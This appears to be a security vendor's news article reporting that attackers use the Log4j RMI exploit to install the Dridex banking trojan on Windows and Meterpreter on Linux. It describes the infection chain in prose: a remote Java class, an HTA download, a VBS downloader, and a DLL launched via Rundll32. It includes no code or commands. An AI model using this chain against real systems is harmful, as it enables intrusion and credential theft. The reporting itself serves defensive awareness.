The Dridex malware is a banking trojan that was originally designed to steal victims’ online banking credentials but has since evolved into a loader that downloads various modules that can be used to perform various malicious actions, such as installing additional payloads, spreading to other devices, taking screenshots, and more.

Dridex infections have been related to ransomware attacks carried out by activities linked to the Evil Corp hacker gang.

What Happened?

Cryptolaemus, a cybersecurity research firm, has warned that the Log4j vulnerability is currently being used to infect Windows devices with the Dridex Trojan and Linux devices with Meterpreter.

According to Joseph Roosen, threat actors harness the Log4j RMI (Remote Method Invocation) exploit variant to force susceptible devices to load and execute a Java class from an attacker-controlled remote server.

As explained by BleepingComputer, when the Java class is launched, it will first try to download and launch an HTA file from multiple URLs, which will install the Dridex trojan. If the Windows instructions cannot be executed, it will assume the device is running Linux/Unix and will download and run a Python script to install Meterpreter.

The Java class on Windows will download and open an HTA file, resulting in the production of a VBS file in the C:ProgramData folder. This VBS program serves as Dridex’s principal downloader and has previously been seen in Dridex email campaigns.

When run, the VBS code will check several environment variables to see if the user is a member of a Windows domain. If the user is a domain member, the VBS code will download the Dridex DLL and run it with Rundll32.exe.


Did you enjoy this article? Follow us on LinkedInTwitterFacebookYoutube, or Instagram to keep up to date with everything we post!

All You Need to Know About the New Zero-Day Found in the Log4j Java Library

Heimdal™ Confirms log4j Vulnerability Does Not Impact Customers

Security Alert: New spam run spreads banking infostealer in Dridex malware class [UPDATED]

Leave a Reply

Your email address will not be published. Required fields are marked *